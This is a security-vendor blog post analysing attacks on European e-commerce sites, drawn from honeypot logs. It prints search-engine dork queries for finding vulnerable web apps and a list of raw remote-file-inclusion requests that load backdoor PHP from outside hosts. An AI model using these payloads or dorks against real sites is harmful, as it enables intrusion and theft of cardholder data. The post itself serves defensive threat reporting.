Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Services
Capture
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

twi-managed-portal-color
Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

twi-briefcase-color-svg
Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

tw-laptop-data
Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

twi-database-color-svg
Database Security

Prevent unauthorized access and exceed compliance requirements.

twi-email-color-svg
Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

tw-officer
Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

tw-network
Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

Common Attack Methodologies Identified in European Customers

As you may have heard, Trustwave SpiderLabs released our Global Security Report (GSR) 2012 Report, which highlights a vast amount of valuable data from our 2011 engagements. In this blog post, I want to highlight a specific section of the GSR which highlights specific attack methodologies used by attackers against our customers in Europe.

There is a section in the GSR dedicated to our Europe, Middle East and Asia (EMEA) region customers. Solomon Bhala, who is a Security Consultant on the Trustwave SpiderLabs Incident Response Team, outlined the following with regards to differenct attack vectors in use in the European region:

In contrast to data compromise trends in the Americas, very few data compromises occurred in POS networks in Europe, the Middle East and Africa (EMEA). Rather, as a result of higher adoption of "chip & pin" (EMV) and deprecation of magnetic stripe (mag-stripe) transactions within Europe, fewer opportunities exist in EMEA for the theft of track data used in mag-stripe transactions.

However, across the region many mag-stripe enabled POS systems remain in use to support mag-stripe only cards or transactions that fall back to mag-stripe when EMV fails. As such, card-present compromises do still occur in small numbers.

Overwhelmingly, e-commerce merchants in EMEA were the targets for cyber criminals. E-commerce businesses allow attackers to be geographically indiscriminate and concerned only with identifying targets that pose little technical complexity in compromising.

The typical vulnerabilities exploited in EMEA investigations were insecure, but legitimate file upload mechanisms or exploitable remote file inclusion vectors.

The typical attack flow looks something like this:

10541_8e8889e1-5942-4e08-aa41-a74be9c881d4

Source: Tustwave's 2012 Global Security Report

The SpiderLabs Research Team has also gathered data from web honeypot systems that confirm this type of attack methodology.

Using Search Engines to Identify Targets

Attackers will often use search engine queries as a method of quickly identifying web sites that have certain characterisics for the vulnerabilties they are looking to exploit. When search engine results are returned, the attacker then has a list of possible target websites to launch attacks. Here are some example Referer data taken from the logs from our web honeypots showing use of search engine usage to identify common vulnerable apps:

http://www.google.com/m?client=ms-aff-ucweb&output=xhtml&hl=en&q=inurl%3a+admin%2f+login.phphttp://www.google.com/m?client=ms-opera-mini&channel=new&q=inurl%3A+log.Txthttp://www.google.com/m?cx=partner-mb-pub-6630117049886772:7963048852&ie=utf8&hl=en&q=inurl%3A%20admin/login.phphttp://www.google.com/m?cx=partner-mb-pub-6630117049886772:7963048852&ie=utf8&hl=en&q=inurl%3A%20adminlogin.phphttp://yandex.ru/yandsearch?text=biz+inurl:/gbook+sign.asp
http://yandex.ru/yandsearch?text=car+used+inurl:/light.cgi?page=
http://yandex.ru/yandsearch?text=check+inurl:/guestbook.asp
http://yandex.ru/yandsearch?text=coid+inurl:/write.asp
http://yandex.ru/yandsearch?text=dates+inurl:/modules.php?name=
http://yandex.ru/yandsearch?text=devalues+inurl:/register+intext:%22upcoming%22+intext:%22published%22+intext:%22submit%22+-inurl:.php+intitle:%22register%22
http://yandex.ru/yandsearch?text=dictionary+inurl:/bbs.cgi?id=
http://yandex.ru/yandsearch?text=event+inurl:/minibbs.cgi?log=
http://yandex.ru/yandsearch?text=harder+inurl:/bbs.cgi?id=
http://yandex.ru/yandsearch?text=inurl:%22blog
http://yandex.ru/yandsearch?text=inurl:_articles.php?homeid=
http://yandex.ru/yandsearch?text=inurl:/fckeditor/editor/filemanager
http://yandex.ru/yandsearch?text=inurl:/index.php?action=stats altered states wikipedia
http://yandex.ru/yandsearch?text=inurl:/index.php?action=stats sanctioning body sports
http://yandex.ru/yandsearch?text=inurl:/index.php?action=stats what accomplishments to put on a resume
http://yandex.ru/yandsearch?text=inurl:/modules.php?name= questions and solutions engineering
http://yandex.ru/yandsearch?text=inurl:/register+intext:%22upcoming%22+intext:%22published%22+intext:%22submit%22+-inurl:.php+intitle:%22register%22+connection
http://yandex.ru/yandsearch?text=inurl:/register+intext:%22upcoming%22+intext:%22published%22+intext:%22submit%22+-inurl:.php+intitle:%22register%22+finance
http://yandex.ru/yandsearch?text=inurl:/register.php+north
http://yandex.ru/yandsearch?text=inurl:/register.php+you
http://yandex.ru/yandsearch?text=inurl:/?show=guestbook&lr=213
http://yandex.ru/yandsearch?text=kept+inurl:/bbs.cgi?id=
http://yandex.ru/yandsearch?text=library+inurl:/bbs.cgi?room=
http://yandex.ru/yandsearch?text=op+inurl:/gbook.cgi?user=
http://yandex.ru/yandsearch?text=print+inurl:/guestbook.php
http://yandex.ru/yandsearch?text=provide+inurl:/bbs.cgi?room=
http://yandex.ru/yandsearch?text=systems+inurl:/board.cgi?action=
http://yandex.ru/yandsearch?text=visits+inurl:/postcards.php?image_id=
http://yandex.ru/yandsearch?text=zi+inurl:/profile.php?id=

Using Vulnerability Scanning Tools/Scripts

Here are a few of the top vulnerability scanner/script names taken from the User-Agent fields of our web honeypot logs:

DataCha0s/2.0Gootkit auto-rooter scannerMade by ZmEu @ WhiteHat Team - www.whitehat.roMaMa CaSpErMorfeus Fucking ScannerZmEu

Exploit Remote File Inclusion Vulnerabilty

Remote File Inclusion vulnerabilities are being extensively targted by attackers as a means to either execute php code or download a trojan backdoor application. Here are some RFI attack payloads that we gathered from our web honeypot just for today:

GET /become_editor.php?theme_path=http://www.univerzum.de/allnett.jpg?? HTTP/1.1
GET /become_editor.php?theme_path=http://www.univerzum.de/byroee.jpg?? HTTP/1.1
GET /become_editor.php?theme_path=?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1
GET //manager/admin/index.php?MGR=http://www.ralphlaurenukonlineshop.com/list.txt????? HTTP/1.1
GET //php/init.poll.php?include_class=http://www.nettunoresidence.it/wp-content/themes/N7.jpg?? HTTP/1.1
GET //php/init.poll.php?include_class=http://www.nettunoresidence.it/wp-content/themes/N8.jpg?? HTTP/1.1
GET //?_SERVER[DOCUMENT_ROOT]=http://www.triz.or.kr//data/log/auto1.txt?? HTTP/1.1
GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://popsiclesocial.com/mmstaging//wp-admin/user/?? HTTP/1.1
GET //wp-content/plugins/wp_rokstories/?src=http://udassham.com//air.php HTTP/1.1
GET //wp-content/themes/arras/library/timhumb.php?src=http://blogger.com.mesco.com.vn/login.php HTTP/1.1
GET //wp-content/themes/arras/library/widgets.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1
GET /wp-content/themes/cadabrapress/scripts/?src=http://blogger.com.3085.a.hostable.me/myid.php HTTP/1.1
GET /wp-content/themes/cadabrapress/scripts/?src=http://flickr.com.javafootwear.com/vegetable.php HTTP/1.1
GET /wp-content/themes/cadabrapress/scripts/_tbs.php?src=http://picasa.com.amplarh.com.br/stun.php HTTP/1.1
GET //wp-content/themes/DeepFocus/_tbs.php?src=http://blogger.com.herzelconsultores.com.ar/shell.php HTTP/1.1
GET ///wp-content/themes/editorial/functions/?src=http://blogger.com.antesagoradepois.com/depois.php HTTP/1.1
GET //wp-content/themes/Magnificent/_tbs.php?src=http://picasa.com.fuckfashionwearart.com/injekan/injekan.php HTTP/1.1
GET ///wp-content/themes/optimize/?src=http://blogger.com.antesagoradepois.com/depois.php HTTP/1.1
GET //wp-content/themes/Polished/_tbs.php?src=http://picasa.com.amplarh.com.br/stun.php HTTP/1.1
GET //wp-content/themes/prosto/functions/?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1
GET //wp-content/themes/sakura/plugins/woo-tumblog/functions/_tbs.php?src=http://picasa.com.fuckfashionwearart.com/injekan/injekan.php HTTP/1.1
GET //wp-content/themes/telegraph/scripts/?src=http://img.youtube.com.uscd.ro/bogel.php HTTP/1.1
GET //wp-?src=http://flickr.com.bpmohio.com/byroe.php HTTP/1.1
GET //wp-?src=http://flickr.com.bpmohio.com/spread.php HTTP/1.1

Each of these files referenced by the http off site payload is some type of PHP code or backdoor. Once the backdoor/trojan web page is installed, the attacker can then use it to do the following:

Search local files for credit card holder data:

10528_8ddbdf26-a3de-455f-bf51-9cf9462fb56e

Directly connect to the database listener to search for records.

This is possible as many ACLs allow access from the localhost. This also allows the attacker to execute SQL queries that may not have been possible through SQL Injection vulnreablities in the web application:

8013_12ee3539-1b85-476a-8469-f0594c0031c8

 

Latest SpiderLabs Blogs

Welcome to Adventures in Cybersecurity: The Defender Series

I’m happy to say I’m done chasing Microsoft certifications (AZ104/AZ500/SC100), and as a result, I’ve had the time to put some effort into a blog series that hopefully will entertain and inform you...

Read More

Trustwave SpiderLabs: Insights and Solutions to Defend Educational Institutions Against Cyber Threats

Security teams responsible for defending educational institutions at higher education and primary school levels often find themselves facing harsh lessons from threat actors who exploit the numerous...

Read More

Breakdown of Tycoon Phishing-as-a-Service System

Just weeks after Trustwave SpiderLabs reported on the Greatness phishing-as-a-service (PaaS) framework, SpiderLabs’ Email Security team is tracking another PaaS called Tycoon Group.

Read More